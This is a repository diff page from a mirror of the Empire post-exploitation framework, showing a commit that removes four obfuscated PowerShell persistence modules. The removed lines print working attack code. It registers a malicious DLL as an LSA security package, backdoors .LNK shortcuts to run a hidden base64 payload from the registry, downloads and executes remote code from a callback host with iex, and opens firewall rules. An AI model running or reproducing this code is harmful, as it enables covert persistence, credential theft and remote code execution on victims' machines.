infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Remove spelling typo

mdns
cobbr 2017-03-11 20:08:52 -06:00
parent 34ee7ad1ed
commit 5308840474
5 changed files with 0 additions and 944 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
data/obfuscated_module_source/persistance/.gitignore → data/obfuscated_module_source/persistence/.gitignore vendored
View File

114
data/obfuscated_module_source/persistence/Get-SecurityPackages.ps1
View File

@ -1,114 +0,0 @@
SeT 8i53f ( [tYpe]("{0}{1}{2}{3}"-f'Appd','O','mA','In')) ; sET-itEM ('VAR'+'Iab'+'Le:4O'+'TI'+'R') ([tYpE]("{5}{3}{6}{1}{0}{7}{2}{4}"-F'sEmbl','It.as','UildEracC','E','Ess','R','flECTIoN.em','YB')) ; SEt-item VAriabLE:Tn86A ( [typE]("{0}{1}{3}{2}"-F 'fLA','gs','E','atTRiBUT') ) ; Set-itEm ("vARIABlE:w"+"2"+"i") ( [tYPe]("{3}{5}{6}{4}{2}{1}{0}" -f'NgsiZe','ki','PAC','reFL','it.','ECT','ioN.eM') ) ; $TDcp81= [TyPe]("{8}{4}{6}{1}{0}{7}{2}{3}{5}" -F'aLlI','n.C','nvEn','Ti','i','Ons','O','NgCo','ReFlEct'); SeT-ITeM vaRiAbLE:xGL ( [TyPE]("{1}{0}"-f 'nt32','i') ) ; $liW9 = [TyPE]("{11}{3}{2}{5}{1}{8}{6}{4}{9}{7}{10}{0}"-F 'IoN','.','Nti','U','l','Me','TeroPseRvICes.Ca','Ng','IN','li','cONvEnT','r'); sv x8o ( [TypE]("{4}{6}{7}{1}{5}{3}{2}{0}" -F 'ArsEt','Inte','.Ch','Es','RUnt','ropsERVIC','im','e.') ) ; $UmdQ8=[tYPE]("{1}{0}" -f 'tR','iNtp') ; $EHv6mU =[TYPe]("{4}{2}{8}{0}{7}{1}{5}{3}{6}" -F'S','Ces','me.Int','s','ruNTi','.maR','haL','erVi','ErOp') ; function Ge`T-s`ecURi`TyPac`KaG`es
{
[CmdletBinding()] Param()
${DYn`ASsEmb`ly} = New-Object ("{0}{1}{5}{3}{4}{2}"-f'S','yste','me','mblyN','a','m.Reflection.Asse')('SSPI')
${ASsem`B`Ly`BuilDeR} = ( GI VARIable:8i53f)."v`ALUe"::"CURrENt`Do`M`AIn"."dEF`I`Ne`d`Yna`MiC`AsSemBly"(${dy`NaSs`eMBLy}, $4oTir::"r`Un")
${M`OduLebu`IL`D`Er} = ${aSS`EmBlY`BU`iLd`er}."DEf`in`eDyNAMi`CmodU`le"('SSPI', ${fal`SE})
${fl`A`gs`c`oNSTRuCtOR} = $tN86A."gE`T`ConStR`uC`ToR"(@())
${f`LAG`sC`Us`To`Ma`TTRIBute} = New-Object ("{3}{4}{0}{10}{1}{9}{7}{8}{6}{5}{2}"-f'le','ion.Emi','r','Re','f','Builde','te','.C','ustomAttribu','t','ct')(${f`lA`gS`cO`NsTRU`CtoR}, @())
${STrucT`A`T`Tr`IBuT`es} = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
${e`NumB`UILDer} = ${MO`duleBU`IL`DER}."D`ef`inE`eNum"('SSPI.SECPKG_FLAG', 'Public', [Int32])
${E`NuMBUi`l`deR}."sETCU`sToM`AtTRibu`TE"(${Fl`AgS`CUStOmat`T`Ri`BUTe})
${n`ULL} = ${enumB`Ui`lD`er}."def`ine`LiTeRaL"('INTEGRITY', 1)
${N`uLL} = ${enUmb`uILD`Er}."D`ef`In`EL`itERal"('PRIVACY', 2)
${N`uLl} = ${enuM`Bu`iL`Der}."dEfIneLITE`R`AL"('TOKEN_ONLY', 4)
${N`uLL} = ${E`NuMbuI`ldER}."DEFiNEL`Iter`AL"('DATAGRAM', 8)
${n`ULL} = ${en`umbUi`l`dER}."def`IN`ElITErAl"('CONNECTION', 0x10)
${nU`lL} = ${EN`umBU`Il`Der}."d`EfinEL`iT`eRAl"('MULTI_REQUIRED', 0x20)
${nU`lL} = ${e`NUMbUiLD`ER}."DeF`IN`eliTeRAL"('CLIENT_ONLY', 0x40)
${NU`ll} = ${e`NUm`BUi`LdeR}."DEfin`el`i`TerAL"('EXTENDED_ERROR', 0x80)
${Nu`ll} = ${EnU`mBUil`D`ER}."dEfi`NELi`TeR`Al"('IMPERSONATION', 0x100)
${nu`ll} = ${e`NumbU`iLd`ER}."DefIN`e`liTERal"('ACCEPT_WIN32_NAME', 0x200)
${N`Ull} = ${ENu`MbUiLD`ER}."DeFINe`LIT`e`RAL"('STREAM', 0x400)
${nU`LL} = ${E`NUmBuil`DER}."d`E`F`InELITERaL"('NEGOTIABLE', 0x800)
${N`ULL} = ${EnUM`Bu`i`ldEr}."dE`FINE`LITeRaL"('GSS_COMPATIBLE', 0x1000)
${nU`Ll} = ${enuMb`uILD`eR}."DefiNElITE`R`Al"('LOGON', 0x2000)
${nU`ll} = ${EnU`Mb`u`ilder}."d`eFiNe`lIt`ErAl"('ASCII_BUFFERS', 0x4000)
${NU`Ll} = ${en`UMBuil`DER}."DE`FinE`Lit`erAl"('FRAGMENT', 0x8000)
${n`ULL} = ${E`NumB`uI`lder}."dEf`inElit`Eral"('MUTUAL_AUTH', 0x10000)
${NU`LL} = ${E`NuMbUIL`D`er}."dEfiNEL`I`TE`RaL"('DELEGATION', 0x20000)
${N`ulL} = ${en`uMbuI`LDER}."DefIn`El`iTeRAl"('READONLY_WITH_CHECKSUM', 0x40000)
${n`ULL} = ${EN`uM`BuIl`DeR}."deFI`NEl`Ite`RaL"('RESTRICTED_TOKENS', 0x80000)
${n`uLL} = ${enU`mbu`ILD`Er}."De`FInel`iteR`AL"('NEGO_EXTENDER', 0x100000)
${Nu`ll} = ${EN`Um`BuILD`Er}."D`eFIN`eL`ITeRAl"('NEGOTIABLE2', 0x200000)
${n`ULL} = ${eN`um`BUILdeR}."D`EfINe`lItERAl"('APPCONTAINER_PASSTHROUGH', 0x400000)
${n`ull} = ${ENuMBU`I`lDeR}."d`EfIn`eLi`Te`RAL"('APPCONTAINER_CHECKS', 0x800000)
${se`C`PKg_`FLag} = ${EnuM`B`UILdEr}."cReATET`y`pE"()
${tYp`eBuiL`Der} = ${M`o`d`UL`ebUILDEr}."DE`Fi`NETYpe"('SSPI.SecPkgInfo', ${sTRUC`Ta`TTrIBuT`es}, [Object], (get-VArIAbLE ('W2'+'i') -vAl )::"siZ`e8")
${N`ulL} = ${ty`Pebui`LDEr}."d`eF`IN`eFIelD"('fCapabilities', ${S`EC`PKg_FL`AG}, 'Public')
${NU`Ll} = ${t`y`peBu`ILder}."De`FiN`e`FieLD"('wVersion', [Int16], 'Public')
${Nu`lL} = ${T`yP`E`BUIldER}."De`FInEFI`Eld"('wRPCID', [Int16], 'Public')
${N`UlL} = ${typE`BuIL`dER}."D`eFI`NEFIElD"('cbMaxToken', [Int32], 'Public')
${n`Ull} = ${T`ypEBu`il`DER}."DE`FiN`EF`iELD"('Name', [IntPtr], 'Public')
${Nu`ll} = ${T`YpE`BUild`ER}."d`e`FInEfieLD"('Comment', [IntPtr], 'Public')
${S`e`CpKG`INFo} = ${tyPebUI`l`d`eR}."c`R`eaTETyPE"()
${tyPe`BUi`ldeR} = ${m`Odulebui`l`der}."D`efIne`TYPe"('SSPI.Secur32', 'Public, Class')
${piNvo`kE`me`T`hOD} = ${TYpE`B`uildER}."de`F`iNEp`i`NvokeMethod"('EnumerateSecurityPackages',
'secur32.dll',
'Public, Static',
( geT-iTeM ('vARiaBL'+'E:tD'+'cP8'+'1') )."v`AlUe"::"s`T`Andard",
[Int32],
[Type[]] @( ( get-VARiaBlE XgL )."V`AlUE"."maKE`BYrEfT`YPE"(),
( VARiabLE ("U"+"mDQ8") )."va`LuE"."MAKe`BYR`E`FTypE"()),
(Item ('v'+'A'+'RiaBL'+'E:lIW9'))."vAl`UE"::"wI`NAPI",
(VaRIaBLE X8o -VaL )::"A`NsI")
${s`e`CUR32} = ${typ`Ebu`iLdEr}."crEA`T`e`TYpe"()
${PAC`kAGEc`ount} = 0
${PAcK`AgeARraY`P`Tr} = ( GET-varIablE ("UMdQ"+"8") )."v`Alue"::"zE`Ro"
${r`e`sUlT} = ${sEC`uR`32}::"EnU`m`E`RATeS`e`cU`RitY`pACKAGEs"([Ref] ${p`AckagE`couNt}, [Ref] ${p`ACkAGE`AR`RAypTr})
if (${R`E`Sult} -ne 0)
{
throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))"
}
if (${pA`CkA`ge`cOUnt} -eq 0)
{
Write-Verbose 'There are no installed security packages.'
return
}
${s`T`RucTaDdRe`SS} = ${paCK`A`GeaRr`AyPtr}
foreach (${I} in 1..${PaC`kAgec`O`u`Nt})
{
${SeCpaC`kagES`T`R`u`Ct} = ( gi ('VARIa'+'bLe:EhV6'+'M'+'u'))."V`AluE"::"PTrt`osTr`uctu`Re"(${s`TRU`cT`ADd`REsS}, [Type] ${SECP`KG`infO})
${STR`ucT`ADDRE`Ss} = [IntPtr] (${sTRUc`TaddrE`Ss}."TO`INt64"() + $ehV6Mu::"SiZE`OF"([Type] ${se`C`Pkg`INFo}))
${na`ME} = ${NU`LL}
if (${seCP`Ac`KaGeS`TrU`ct}."n`AME" -ne (dIR ('varI'+'A'+'ble'+':'+'uMdq8'))."VAl`uE"::"ze`Ro")
{
${n`Ame} = (geT-cHiLdiTEM ("vaRIabl"+"e:e"+"H"+"V6mu"))."V`AluE"::"p`TRt`ostRiNg`A`NSI"(${s`eCpack`AGeSTR`UCt}."na`Me")
}
${C`Omm`eNt} = ${N`UlL}
if (${S`Ec`P`ACkA`GeStru`ct}."COmm`ent" -ne ( gi ("vaRI"+"ab"+"Le"+":UMd"+"Q8") )."VAL`UE"::"Z`ERO")
{
${C`oMMeNt} = (varIAbLE Ehv6mu )."va`LUE"::"PTR`T`oSTr`InGan`SI"(${SE`C`pacK`AGE`St`RUcT}."cOMmE`NT")
}
${AT`TrIbUt`Es} = @{
"nA`me" = ${Na`ME}
"Co`MmeNT" = ${c`omme`Nt}
"Cap`Abil`iTI`es" = ${s`E`CP`AcKAG`ES`TrucT}."FCaP`Ab`Il`IT`iES"
"MA`Xto`KenSiZe" = ${seCp`Ac`K`A`GestRUCT}."C`BM`AxToKen"
}
${SE`cP`AcKA`GE} = New-Object ("{2}{1}{0}"-f 't','c','PSObje') -Property ${A`TT`R`iBUteS}
${sECpacK`A`Ge}."PS`o`Bject"."Typ`e`NamEs"[0] = 'SECUR32.SECPKGINFO'
${Sec`pACka`ge}
}
}

171
data/obfuscated_module_source/persistence/Install-SSP.ps1
View File

@ -1,171 +0,0 @@
${Y`cDt} = [tYpe]("{4}{3}{6}{7}{5}{1}{0}{2}" -f'en','pal.windowSId','Tity','ecuR','S','CI','I','TY.pRin') ; Set-vaRIAbLE ("{1}{0}" -f'rj','f') ( [tYpe]("{0}{2}{6}{1}{7}{4}{3}{8}{5}"-f 'S','Y.PrInCI','eCuRi','bUIL','Ows','LE','T','pal.WINd','tINro') ) ; ${X`kW} = [tYPe]("{2}{1}{3}{0}" -F'IlemOdE','StEM','Sy','.io.f') ; sV ('x1'+'uO') ( [TYPE]("{0}{4}{2}{6}{1}{3}{5}" -F'SyStEM','c','.fiLe','C','.iO','Ess','A')) ; Set-IteM ("varIaBLe:u"+"W"+"b") ( [TYpe]("{1}{0}{4}{3}{2}"-f'.','sySTEm','Ng','OdI','TeXt.asCiienc') ) ;${60Oc} = [TYpE]("{6}{2}{1}{3}{4}{0}{5}"-f'koRig','M.io.S','te','e','E','iN','SYs'); sV ('yAp'+'vd') ( [TyPE]("{2}{1}{0}"-F'MaIN','dO','App') ) ; ${8d`B6O5}=[TYpE]("{1}{3}{6}{2}{0}{4}{5}" -f 'emBlybu','Ref','.ASS','LE','IlD','ERACCESS','CTIon.emit'); Set-ITEm ("vAr"+"Iable:"+"T"+"8Cg") ([TyPe]("{3}{5}{7}{0}{6}{4}{8}{2}{1}"-f 'o','onS','TI','Ref','al','lECT','n.c','I','lINgcoNVEn') ) ; SET-vAriAbLe ("{0}{1}" -f '0','zs') ( [type]("{2}{7}{0}{6}{5}{1}{3}{4}"-f'Me.','eRvIce','rUn','S.CaLlI','NgcONVEnTIoN','Terops','IN','TI') ); SEt ("{0}{1}" -f 'N','5m') ( [tYPE]("{0}{5}{4}{6}{8}{2}{7}{3}{1}"-F'ru','harSEt','PserV','.C','tIM','N','E.','IcES','iNTERo') ) ;${c`7fb`dZ} = [TyPE]("{0}{2}{1}"-F 'I','TPtr','n');${6`O0hvP}= [TYPE]("{3}{0}{2}{5}{1}{7}{4}{6}" -f'u','in','NtIme','R','icES.MaRshA','.','l','teropSerV') ;function INStAl`l-`S`sP
{
[CmdletBinding()] Param (
[ValidateScript({Test-Path (Resolve-Path ${_})})]
[String]
${p`Ath}
)
${PrI`N`ciPaL} = [Security.Principal.WindowsPrincipal] ${yc`dt}::"G`EtCuRRe`Nt"()
if(-not ${P`RI`NC`IPal}."I`SinRolE"( (GI ("{3}{0}{2}{1}" -f 'ARi','Le:frj','ab','V')).VAlUe::"Adm`I`NisTR`At`OR"))
{
throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.'
}
${FUlLDLl`p`A`Th} = Resolve-Path ${Pa`TH}
function LOCAl:g`Et-peaRcHItE`C`TU`Re
{
Param
(
[Parameter( pOsITion = 0,
MandATory = ${TR`Ue} )]
[String]
${pA`Th}
)
${Fil`e`S`TreaM} = New-Object ("{3}{0}{1}{2}{4}" -f 's','tem.I','O.FileS','Sy','tream')(${Pa`Th}, ${X`KW}::"Op`eN", (gi ('Va'+'r'+'iaB'+'lE'+':x1uO')).vALUe::"rE`Ad")
[Byte[]] ${m`zHe`A`der} = New-Object ("{0}{1}" -f 'Byte','[]')(2)
${F`IL`eS`TrEAM}."RE`AD"(${m`Zhe`ADER},0,2) | Out-Null
${h`EA`dER} = ( childITEM ("VarIabLE:u"+"w"+"B") ).VaLue::"aS`CII"."gEt`StRi`Ng"(${M`ZHEad`ER})
if (${hE`AdEr} -ne 'MZ')
{
${F`IlE`sTRe`AM}."cLo`se"()
Throw 'Invalid PE header.'
}
${Fi`lEST`REAM}."S`eeK"(0x3c, ( geT-ChilDItem ("{1}{0}{3}{4}{2}" -f 'Le','VARIAB','C',':','60O')).Value::"BE`GIn") | Out-Null
[Byte[]] ${L`FaN`EW} = New-Object ("{1}{0}"-f ']','Byte[')(4)
${F`IlEs`TreAm}."RE`AD"(${Lf`AnEw},0,4) | Out-Null
${PEoF`FS`et} = [Int] ('0x{0}' -f (( ${l`F`AnEW}[-1..-4] | % { ${_}."tOst`R`ING"('X2') } ) -join ''))
${FIl`eStrE`AM}."se`ek"(${pE`o`FFSEt} + 4, ( Ls ("v"+"aRIAb"+"L"+"e:60OC") ).ValUe::"b`eGin") | Out-Null
[Byte[]] ${i`mAGE_`File_`m`ACh`iNe} = New-Object ("{2}{0}{1}" -f'e[',']','Byt')(2)
${FI`Les`TRE`Am}."rE`AD"(${ImAGe_`File`_`M`Ach`Ine},0,2) | Out-Null
${aRch`ITeC`T`URE} = '{0}' -f (( ${ImaGe_`FiL`E`_mACHiNe}[-1..-2] | % { ${_}."Tost`RInG"('X2') } ) -join '')
${FI`LESt`Ream}."Cl`ose"()
if ((${A`RcHi`TeCtu`RE} -ne '014C') -and (${aRC`hiteCT`uRe} -ne '8664'))
{
Throw 'Invalid PE header or unsupported architecture.'
}
if (${ARcHi`TECTu`Re} -eq '014C')
{
Write-Output '32-bit'
}
elseif (${archIT`ec`TUre} -eq '8664')
{
Write-Output '64-bit'
}
else
{
Write-Output 'Other'
}
}
${DL`larchiT`Ec`TUre} = Get-PEArchitecture ${fu`L`ld`LlPath}
${OS`ARcH} = Get-WmiObject ("{1}{6}{3}{2}{0}{5}{4}" -f 'erating','Wi','Op','2_','tem','Sys','n3') | Select-Object -ExpandProperty ("{0}{2}{1}"-f'O','ture','SArchitec')
if (${d`ll`ArcH`itE`CTURE} -ne ${O`SArcH})
{
throw 'The operating system architecture must match the architecture of the SSP dll.'
}
${D`Ll} = Get-Item ${FULl`D`LlP`ATH} | Select-Object -ExpandProperty ("{1}{0}" -f 'e','Nam')
${dLl`N`Ame} = ${D`ll} | % { % {(${_} -split '\.')[0]} }
${sec`urI`Typa`ck`AgES} = Get-ItemProperty (("{8}{2}{10}{6}{5}{4}{12}{11}{1}{7}{0}{3}{9}" -f 'olSet','n','M:rAUSYST','rAUCon','r','UCu','MrA','tr','HKL','trolrAULsa','E','ntCo','re')).REPLacE('rAU','\') -Name 'Security Packages' |
Select-Object -ExpandProperty 'Security Packages'
if (${SeCUR`ITy`p`AcK`A`gEs} -contains ${dLlN`A`me})
{
throw "'$DllName' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages."
}
${N`ATive`I`NStA`L`lDir} = "$($Env:windir)\Sysnative"
if (Test-Path ${NatIVe`iNsta`l`LdIR})
{
${iNst`AL`lD`Ir} = ${nativ`eI`Ns`TalLDIR}
}
else
{
${iNSta`l`l`dIR} = "$($Env:windir)\System32"
}
if (Test-Path (Join-Path ${iNstA`L`LD`IR} ${d`ll}))
{
throw "$Dll is already installed in $InstallDir."
}
Copy-Item ${ful`L`dlLp`AtH} ${INStAll`D`Ir}
${S`ecuRit`ypAcKA`gES} += ${dl`L`Name}
Set-ItemProperty ((("{1}{8}{0}{4}{2}{9}{5}{6}{7}{10}{3}" -f 'Y','HKLM:','QD1CurrentContro','1Lsa','STEM','etQ','D1Contro','lQ','QD1S','lS','D')) -cRePLace 'QD1',[cHAR]92) -Name 'Security Packages' -Value ${SEC`U`RityP`ACkages}
${DYnaS`S`eMblY} = New-Object ("{0}{1}{7}{4}{2}{5}{6}{3}" -f 'S','yste','e','Name','R','flecti','on.Assembly','m.')('SSPI2')
${assE`M`BLyBUil`Der} = ${yAP`Vd}::"CU`Rre`NtDoma`IN"."de`FI`NED`y`NAmIcaS`semb`LY"(${dyna`S`Sem`BLY}, ( DiR ("{0}{1}{3}{2}{4}" -f'vaR','iAb','8d','le:','B6o5') ).vALUe::"r`uN")
${M`odULebUi`lder} = ${Assem`B`LYbu`I`LDEr}."deF`inEDyna`mI`cmOD`u`LE"('SSPI2', ${faL`sE})
${Ty`PebuILD`er} = ${MODUL`eBU`Il`DER}."De`F`inE`TYpe"('SSPI2.Secur32', 'Public, Class')
${PIn`V`OKE`m`eTHOD} = ${TY`pEbuiL`deR}."De`FinePINvo`kEm`E`THoD"('AddSecurityPackage',
'secur32.dll',
'Public, Static',
${T8`Cg}::"stA`ND`ARD",
[Int32],
[Type[]] @([String], [IntPtr]),
( gET-VarIABle ("{1}{0}" -f 'ZS','0') -ValUeonl )::"WInA`PI",
${n`5M}::"AU`TO")
${S`Ecu`R32} = ${TYp`e`BUI`lDEr}."C`REaTET`YpE"()
if ( ( vaRiAble ('c'+'7FbDZ') ).VAlUe::"S`Ize" -eq 4) {
${S`Tructs`i`ZE} = 20
} else {
${S`TrucTs`ize} = 24
}
${S`T`RUctpTr} = ( gI ("{1}{4}{3}{0}{2}"-f '0','v','hVp','BlE:6O','ARIa') ).VALUE::"AL`lo`cHgLObal"(${str`Uct`SIzE})
( chILDITeM ("{2}{1}{0}{3}"-f'O0H','riaBLE:6','VA','VP') ).Value::"wrIT`e`iNt32"(${st`R`u`CTptr}, ${sTru`C`TSI`Ze})
${runTI`M`eSUC`Ce`SS} = ${t`Rue}
try {
${rE`SU`lt} = ${s`Ec`ur32}::"AddS`E`c`U`RitypAck`Age"(${dLl`N`AME}, ${STRuC`T`pTR})
} catch {
${hR`e`sult} = ${er`ROR}[0]."Excep`Ti`ON"."I`NnE`R`eXCePT`ioN"."HrESU`LT"
Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))"
Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)"
${RUN`TiMES`Uc`cE`SS} = ${f`AlsE}
}
if (${Ru`NT`iMESU`cCEsS}) {
Write-Verbose 'Installation and loading complete!'
} else {
Write-Verbose 'Installation complete! Reboot for changes to take effect.'
}
}

76
data/obfuscated_module_source/persistence/Invoke-BackdoorLNK.ps1
View File

@ -1,76 +0,0 @@
${0`4Dp}= [tYpe]("{0}{2}{4}{3}{1}" -F'sys','ding','teM.TE','ENCo','xt.') ; ${x`8Yn9} = [typE]("{0}{4}{3}{2}{1}"-F 'Sy','t','NVer','Tem.Co','S'); function iN`VOKe-BaCkdoO`Rl`NK {
[CmdletBinding()] Param(
[Parameter(vaLueFrOMPIPeLINe=${T`Rue}, MAnDAtory = ${t`RuE})]
[ValidateScript({Test-Path -Path ${_} })]
[String]
${l`NkpATh},
[String]
${ENcs`cr`IpT},
[String]
${rEG`pA`TH} = 'HKCU:\Software\Microsoft\Windows\debug',
[Switch]
${C`LEANUp}
)
${ReG`pa`Rts} = ${REG`pA`TH}."sp`LIT"("\")
${PA`Th} = ${r`e`GpaRtS}[0..(${r`EGp`Ar`TS}."c`OUnt"-2)] -join "\"
${N`AmE} = ${RE`Gp`ArTS}[-1]
${o`Bj} = New-Object -ComObject ("{0}{2}{1}"-f'WScri','ll','pt.She')
${l`Nk} = ${o`Bj}."crE`At`esHo`Rtcut"(${LNK`pa`Th})
${Targ`e`T`patH} = ${L`NK}."tA`RgE`TpA`Th"
${W`Ork`iN`g`DIRECTory} = ${l`NK}."WOrkING`DIr`Ec`T`oRy"
${icOn`LOCat`Ion} = ${L`NK}."Ic`oN`LO`cATION"
if(${CL`eAnUp}) {
${ORIg`I`NAl`p`ATh} = (${ic`onl`o`caTiOn} -split ",")[0]
${l`NK}."tArg`eTPA`Th" = ${ORiGI`NALP`ATh}
${L`Nk}."ArgU`m`ents" = ${Nu`LL}
${l`NK}."w`ind`o`wstylE" = 1
${L`Nk}."s`AvE"()
${N`uLL} = Remove-ItemProperty -Force -Path ${Pa`Th} -Name ${N`AmE}
}
else {
if(!${enC`scr`ipt} -or ${e`N`cSC`RIpT} -eq '') {
throw "-EncScript or -Cleanup required!"
}
${Nu`Ll} = Set-ItemProperty -Force -Path ${p`ATH} -Name ${N`AMe} -Value ${en`CSCRI`PT}
"[*] B64 script stored at '$RegPath'`n"
${L`Nk}."Ta`RGEtpa`TH" = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
${L`A`uNch`StR`iNG} = '[System.Diagnostics.Process]::Start("'+${T`ArGetp`AtH}+'");IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp '+${P`AtH}+' '+${nA`Me}+').'+${na`ME}+')))'
${LAU`N`c`HBYteS} = ( cHiLdITem ("{4}{3}{2}{0}{1}"-f'4','dP',':0','iaBLE','VaR') )."v`Alue"::"UN`icode"."gETB`Y`TEs"(${LAun`cH`STRI`Ng})
${laUnC`H`B64} = ( dIr ("v"+"ar"+"iABLE:x8y"+"N9") )."v`ALuE"::"T`OBAse`64STri`Ng"(${LaU`Nchby`T`es})
${L`Nk}."a`Rg`UMEnts" = "-w hidden -nop -enc $LaunchB64"
${L`Nk}."WorK`INGdIR`e`C`ToRY" = ${W`oR`KInGdIrEc`TORy}
${l`Nk}."I`c`OnLocA`TION" = "$TargetPath,0"
${l`Nk}."wIN`dow`STy`le" = 7
${L`NK}."SA`VE"()
"[*] .LNK at $LNKPath set to trigger`n"
}
}

583
data/obfuscated_module_source/persistence/PowerBreach.ps1
View File

@ -1,583 +0,0 @@
$5kzyIT = [TYpE]("{4}{0}{1}{2}{3}" -F'e','t.SErV','I','CEPoinTmanAGeR','sySTem.n') ; $nzV2aP =[tyPe]("{1}{3}{2}{4}{0}"-F 'Rt','SYs','n','tEm.Co','vE') ; seT ('T'+'1o5') ( [Type]("{0}{3}{1}{2}" -f'sysTEM.T','nC','oding','exT.e') ) ;SeT-ITEM ("{3}{2}{0}{1}{4}" -f':Tr','i','bLe','varIa','XE') ( [tYPe]("{0}{3}{2}{1}"-F'sysTEm','s','.Dn','.neT') ) ; seT ("ZN"+"u") ( [type]("{2}{1}{3}{4}{5}{0}{6}" -F 't','ecURitY.PRiNC','s','ipAL.wInDoWs','ID','en','itY')) ; SET-itEm ("VArIABle"+":q8WgP"+"c") ( [TypE]("{0}{1}"-f'rE','gEX')) ; Sv ("{1}{0}" -f 'iUY','l8f') ([typE]("{3}{2}{4}{1}{0}" -f 'EtS.aDDReSsFaMIlY','K','t','NE','.SOc'));sEt-iteM ("{0}{3}{2}{1}"-f 'vaRiAb','pVj','4','lE:26') ( [typE]("{0}{5}{2}{4}{3}{1}"-F'nET.S','kettYpE','cKeTS.','Oc','s','o') ) ; SEt-IteM ("{2}{0}{3}{1}"-f 'blE','ACs','VArIa',':E') ([TYPE]("{2}{4}{3}{6}{1}{5}{0}{7}" -F'lT','o','neT.sO','KeT','c','TOcO','S.Pr','yPE') ); set-iTEM ("{3}{2}{0}{1}" -f 'bLE:','jMHB','aRiA','v') ([TYpE]("{1}{6}{2}{3}{5}{4}{0}" -F'e','NET','SOCkeTS','.IOCOnt','D','rOLCO','.')) ; sET-ITem ("vA"+"rIabLE:y"+"4"+"h"+"br") ( [tYpe]("{0}{1}{3}{4}{2}"-f 'NeT.SO','CKeTs.socKETFL','S','A','G')); Sv ("I6S"+"5nr") ( [tYpE]("{0}{1}{2}"-f'daT','ET','Ime'));
function iNv`okE-Ca`LlbAck`IEx
{
Param(
[Parameter(mANDatOry=${Tr`uE},poSitION=1)]
[string]${cAl`l`BAcKip},
[Parameter(mandatoRy=${Fa`LSE},poSitIoN=2)]
[int]${me`T`hOD}=0,
[Parameter(MAndaToRy=${F`AlSE},posITION=3)]
[string]${bI`TSt`eMPFi`Le}="$env:temp\ps_conf.cfg",
[Parameter(mANDAtOrY=${F`ALse},POsiTIoN=4)]
[string]${R`E`SouRCe}="/favicon.ico",
[Parameter(MaNDaTory=${FA`lsE},POsITIon=5)]
[bool]${sI`lENT}=${f`A`lSE}
)
if(${c`All`Ba`ckIP})
{
try {
if (${Met`H`OD} -eq 0)
{
${u`RL}="http://$CallbackIP$resource"
if(-not ${SiL`enT}) {write-host "Calling home with method $method to: $url"}
${e`NC} = (new-object ("{2}{0}{1}"-f 't','.webclient','ne'))."dOwn`loA`D`String"(${U`Rl})
}
elseif (${meT`h`od} -eq 1)
{
$5KZYIt::"S`eRv`e`RC`e`RTiFIcatEVali`DATiON`cAlLB`A`ck" = {${tr`ue}}
${u`RL}="https://$CallbackIP$resource"
if(-not ${s`IlenT}) {write-host "Calling home with method $method to: $url"}
${E`Nc} = (new-object ("{0}{2}{1}"-f'net.','client','web'))."DO`WnlOaD`St`Ring"(${u`RL})
}
elseif (${me`TH`oD} -eq 2)
{
${u`RL}="http://$CallbackIP$resource"
if(-not ${s`iL`EnT}) { write-host "Calling home with method $method to: $url"
write-host "BITS Temp output to: $BitsTempFile"}
Import-Module ("{0}{1}" -f '*','bits*')
Start-BitsTransfer ${u`RL} ${biTS`T`EM`p`FIle} -ErrorAction ("{1}{0}" -f'op','St')
${e`NC} = Get-Content ${biT`StEMp`FILe} -ErrorAction ("{1}{0}"-f'p','Sto')
Remove-Item ${B`It`St`eMpF`iLe} -ErrorAction ("{1}{3}{2}{0}"-f 'tinue','Si','entlyCon','l')
}
else
{
if(-not ${s`I`leNt}) { write-host "Error: Improper callback method" -fore ("{1}{0}"-f 'ed','r')}
return 0
}
if (${e`Nc})
{
${B} = (Gi ("{0}{1}{3}{2}"-f'VarIA','BLe:nz','p','v2A') ).vALuE::"f`RombAS`E64`stR`ING"(${E`NC})
${D`Ec} = ( gI ("VArIA"+"ble"+":T1o5")).VaLuE::"U`Tf8"."gETStr`i`NG"(${b})
iex ${D`EC}
}
else
{
if(-not ${s`ILE`Nt}) { write-host "Error: No Data Downloaded" -fore ("{0}{1}"-f'r','ed')}
return 0
}
}
catch [System.Net.WebException]{
if(-not ${sIl`Ent}) { write-host "Error: Network Callback failed" -fore ("{0}{1}" -f'r','ed')}
return 0
}
catch [System.FormatException]{
if(-not ${s`IlE`NT}) { write-host "Error: Base64 Format Problem" -fore ("{1}{0}" -f 'ed','r')}
return 0
}
catch [System.Exception]{
if(-not ${S`ILEnt}) { write-host "Error: Uknown problem during transfer" -fore ("{0}{1}" -f 'r','ed')}
return 0
}
}
else
{
if(-not ${sile`NT}) { write-host "No host specified for the phone home :(" -fore ("{1}{0}"-f'ed','r')}
return 0
}
return 1
}
function Ad`D-PS`FIrE`wA`LLru`Les
{
Param(
[Parameter(MaNDaToRY=${FA`LsE},pOsITion=1)]
[string]${ruL`en`Ame}="Windows Powershell",
[Parameter(maNDAtorY=${F`A`lSe},PoSItioN=2)]
[string]${e`xE`PATH}="C:\windows\system32\windowspowershell\v1.0\powershell.exe",
[Parameter(maNdatOry=${fAL`SE},poSitIon=3)]
[string]${P`oRtS}="1-65000"
)
If (-NOT ([Security.Principal.WindowsPrincipal] (GeT-vArIAblE ("zN"+"U") -ValueO )::"GEtCu`RR`eNt"())."IS`inR`OLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Host "This command requires Admin :(... get to work! "
Return
}
${fw} = New-Object -ComObject ("{2}{1}{3}{0}"-f'2','cfg.fwp','hnet','olicy')
${R`ULE} = New-Object -ComObject ("{2}{1}{3}{0}" -f 'e','NetCf','H','g.FWRul')
${R`ulE}."n`AME" = ${Rul`E`Na`ME}
${R`ULE}."apP`LICAt`I`Onna`Me"=${e`XEPA`TH}
${RU`Le}."p`RO`TOcOL" = 6
${rU`LE}."loC`A`LPOrTS" = ${p`oRtS}
${ru`LE}."dI`ReCTIOn" = 2
${Ru`Le}."E`NA`BlED"=${t`RuE}
